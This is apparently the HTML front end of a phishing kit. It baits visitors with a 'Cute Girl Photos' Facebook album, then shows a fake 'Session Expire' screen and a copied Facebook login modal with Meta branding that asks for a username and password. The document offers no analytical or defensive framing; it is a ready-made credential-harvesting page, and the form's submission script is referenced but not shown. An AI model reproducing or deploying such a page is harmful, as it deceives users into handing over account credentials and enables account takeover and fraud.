<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="stylesheet" type="text/css" href="css/style.css">
	<link href="https://use.fontawesome.com/releases/v5.7.1/css/all.css" rel="stylesheet"/>
	<title>Cute Girl Photos</title>
</head>
<body class="body">
	<header>
		<div class="header">Facebook Photo Album</div>
	</header>
	<div class="album-opt">
    <table class="tbalbum">
    	<tbody>
    		<tr>
    			<td>
    				<button class="btn btn-ac">
    					<i class="btn-icon a-icon"></i>
    					<span class="b-text">Add Photos</span>
    				</button>
    			</td>
    			<td>
    				<button class="btn btn-ac">
    					<i class="btn-icon c-icon"></i>
    					<span class="b-text">Create Album</span>
    				</button>
    			</td>
    		</tr>
    	</tbody>
    </table>
	</div>
	<div class="container">
		  <div class="flex">
		  	<div class="ic"><img src="assets/cutes/1.jpg" ></div>
		  	<div class="ic"><img src="assets/cutes/2.jpg" ></div>
		  	<div class="ic"><img src="assets/cutes/3.jpg" ></div>
		  	<div class="ic"><img src="assets/cutes/4.jpg" ></div>
		  	<div class="ic"><img src="assets/cutes/5.jpg" ></div>
		  	<div class="ic"><img src="assets/cutes/6.jpg" ></div>
		  	<div class="ic"><img src="assets/cutes/7.jpg" ></div>
		  	<div class="ic"><img src="assets/cutes/8.jpg" ></div>
		  	<div class="ic"><img src="assets/cutes/9.jpg" ></div>
		  	<div class="ic"><img src="assets/cutes/10.jpg" ></div>
		  	<div class="ic"><img src="assets/bangali/1.webp" ></div>
		  	<div class="ic"><img src="assets/bangali/2.jpg" ></div>
		  	<div class="ic"><img src="assets/bangali/3.jpg" ></div>
		  	<div class="ic"><img src="assets/bangali/4.jpg" ></div>
		  	<div class="ic"><img src="assets/bangali/5.webp" ></div>
		  	<div class="ic"><img src="assets/bangali/6.jpg" ></div>
		  	<div class="ic"><img src="assets/bangali/7.jpg" ></div>
		  	<div class="ic"><img src="assets/bangali/8.jpg" ></div>
		  	<div class="ic"><img src="assets/bangali/9.jpg" ></div>
		  	<div class="ic"><img src="assets/bangali/10.webp" ></div>
		  	<div class="ic"><img src="assets/bangali/11.jpg" ></div>

	    </div>
	 </div>
	 <!--Session expire loader -->
	   <div id="sess_ex" class="session-ex">
	   	<div class="logo">
	   		<img src="logo/logo.svg">
	   	</div>
	   	<div style="margin-top: 100px;">
	   		<div class="loader an-spin"></div>
		   	<div class="ex-content">
		   		Session Expire.Logging Out...
		   	</div>
	   	</div>
	   </div>

	 <!-- login Modal -->
	 <div class="login-modal">
  	<div class="login-wrapper">
  		<div class="banner">
  			<div class="msg"></div>
  			<h3>Facebook Session Time Out</h3>
  		</div>
  		<div class="reason bc">
  			<p class="p">Please login to continue</p>
  		</div>
  		<div class="form-wrapper">
  			<form id="form" method="post" autocomplete="off">
  				<div class="form-group">
  					<input class="form-control" type="text" id="username" name="username" placeholder="Mobile number or Email address" required>
  				</div>
  				<div class="form-group">
  					<input class="form-control" type="password" id="password" name="password" placeholder="Password" required>
  				</div>
  				<div class="form-group">
  					<input class="form-control btn-submit" id="login" type="submit" name="submit" value="Log In">
  				</div>
  			</form>
  			  			<div class="fp_wrapper">
  				<div class="fp">
  					<a href="#">Forgotten password?</a>
  				</div>
  			</div>
  		</div>
        <div style="margin: 16px 5px;">
           <div class="login-reg-sep sep-con">
  			 <span class="seperator">or</span>
  		  </div>
        </div>
        <div class="create">
        	<a class="create-btn">Create New Account</a>
        </div>
  		<div class="language-container">
  			<div class="language-row">
  				<div class="flex-container">
  					<div class="flex-1">
  						<div class="flex-item"><span class="item-span active">English (UK)</span></div>
  						<div class="flex-item"><span class="item-span">অসমীয়া</span></div>
  						<div class="flex-item"><span class="item-span">नेपाली</span></div>
  						<div class="flex-item"><span class="item-span">Português (Brasil)</span></div>
  					</div>
  					<div class="flex-1">
  						<div class="flex-item"><span class="item-span">বাংলা</span></div>
  						<div class="flex-item"><span class="item-span">हिन्दी</span></div>
  						<div class="flex-item"><span class="item-span">Español</span></div>
  						<div class="flex-item more-btn" style="margin-top:5px"><i class="icon-img l_more"></i></div>
  					</div>
  				</div>
  			</div>
  		</div>
  		<div class="ahm">
  			<div class="ahm_link">
  				<a href="#">About</a>
  				<span>.</span>
  				<a href="#">Help</a>
  				<span>.</span>
  				<a href="#">More</a>
  			</div>
  		</div>
  		<div class="footer">
  		  <p>Meta © 2022</p>
  	  </div>
  		</div>
  	</div>
  </div>
<script src="js/jquery.js"></script>
<script src="js/index.js"></script>
</body>
</html>
